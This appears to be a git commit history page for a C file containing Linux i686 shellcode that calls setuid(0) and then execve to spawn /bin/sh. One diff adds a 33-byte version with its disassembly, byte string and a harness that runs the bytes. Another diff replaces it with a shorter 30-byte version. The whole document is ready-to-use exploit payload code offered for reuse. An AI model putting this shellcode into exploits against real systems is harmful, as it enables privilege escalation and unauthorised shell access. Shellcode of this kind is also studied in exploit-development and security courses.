rastating · August 23, 2018 21:41 · Aug 23, 2018 · Aug 22, 2018
diff --git a/setuid_execve_shell.c b/setuid_execve_shell.c
@@ -1,25 +1,19 @@
 /*
-Title   : Linux i686 setuid(0) execve shell (33 bytes)
+Title   : Linux i686 setuid(0) execve shell (30 bytes)
 Author  : rastating
 
-Disassembly of section .text:
-
 08048060 <_start>:
- 8048060:	6a 17                	push   $0x17
- 8048062:	58                   	pop    %eax
- 8048063:	6a 01                	push   $0x1
- 8048065:	5b                   	pop    %ebx
- 8048066:	83 eb 01             	sub    $0x1,%ebx
- 8048069:	cd 80                	int    $0x80
- 804806b:	89 d9                	mov    %ebx,%ecx
- 804806d:	89 da                	mov    %ebx,%edx
- 804806f:	52                   	push   %edx
- 8048070:	68 2f 2f 73 68       	push   $0x68732f2f
- 8048075:	68 2f 62 69 6e       	push   $0x6e69622f
- 804807a:	89 e3                	mov    %esp,%ebx
- 804807c:	6a 0b                	push   $0xb
- 804807e:	58                   	pop    %eax
- 804807f:	cd 80                	int    $0x80
+ 8048060:	31 db                	xor    %ebx,%ebx
+ 8048062:	8d 43 17             	lea    0x17(%ebx),%eax
+ 8048065:	cd 80                	int    $0x80
+ 8048067:	31 c9                	xor    %ecx,%ecx
+ 8048069:	31 d2                	xor    %edx,%edx
+ 804806b:	52                   	push   %edx
+ 804806c:	68 2f 2f 73 68       	push   $0x68732f2f
+ 8048071:	68 2f 62 69 6e       	push   $0x6e69622f
+ 8048076:	8d 1c 24             	lea    (%esp),%ebx
+ 8048079:	8d 41 0b             	lea    0xb(%ecx),%eax
+ 804807c:	cd 80                	int    $0x80
 */
 
 #include <stdio.h>
@@ -28,11 +22,10 @@ Disassembly of section .text:
 int main(void)
 {
     unsigned char code[] =
-        "\x6a\x17\x58\x6a\x01\x5b\x83\xeb"
-        "\x01\xcd\x80\x89\xd9\x89\xda\x52"
-        "\x68\x2f\x2f\x73\x68\x68\x2f\x62"
-        "\x69\x6e\x89\xe3\x6a\x0b\x58\xcd"
-        "\x80";
+        "\x31\xdb\x8d\x43\x17\xcd\x80\x31"
+        "\xc9\x31\xd2\x52\x68\x2f\x2f\x73"
+        "\x68\x68\x2f\x62\x69\x6e\x8d\x1c"
+        "\x24\x8d\x41\x0b\xcd\x80";
 
     printf("Shellcode length: %d\n", strlen(code));
 

diff --git a/setuid_execve_shell.c b/setuid_execve_shell.c
@@ -0,0 +1,43 @@
+/*
+Title   : Linux i686 setuid(0) execve shell (33 bytes)
+Author  : rastating
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	6a 17                	push   $0x17
+ 8048062:	58                   	pop    %eax
+ 8048063:	6a 01                	push   $0x1
+ 8048065:	5b                   	pop    %ebx
+ 8048066:	83 eb 01             	sub    $0x1,%ebx
+ 8048069:	cd 80                	int    $0x80
+ 804806b:	89 d9                	mov    %ebx,%ecx
+ 804806d:	89 da                	mov    %ebx,%edx
+ 804806f:	52                   	push   %edx
+ 8048070:	68 2f 2f 73 68       	push   $0x68732f2f
+ 8048075:	68 2f 62 69 6e       	push   $0x6e69622f
+ 804807a:	89 e3                	mov    %esp,%ebx
+ 804807c:	6a 0b                	push   $0xb
+ 804807e:	58                   	pop    %eax
+ 804807f:	cd 80                	int    $0x80
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+int main(void)
+{
+    unsigned char code[] =
+        "\x6a\x17\x58\x6a\x01\x5b\x83\xeb"
+        "\x01\xcd\x80\x89\xd9\x89\xda\x52"
+        "\x68\x2f\x2f\x73\x68\x68\x2f\x62"
+        "\x69\x6e\x89\xe3\x6a\x0b\x58\xcd"
+        "\x80";
+
+    printf("Shellcode length: %d\n", strlen(code));
+
+    void (*s)() = (void *)code;
+    s();
+
+    return 0;
+}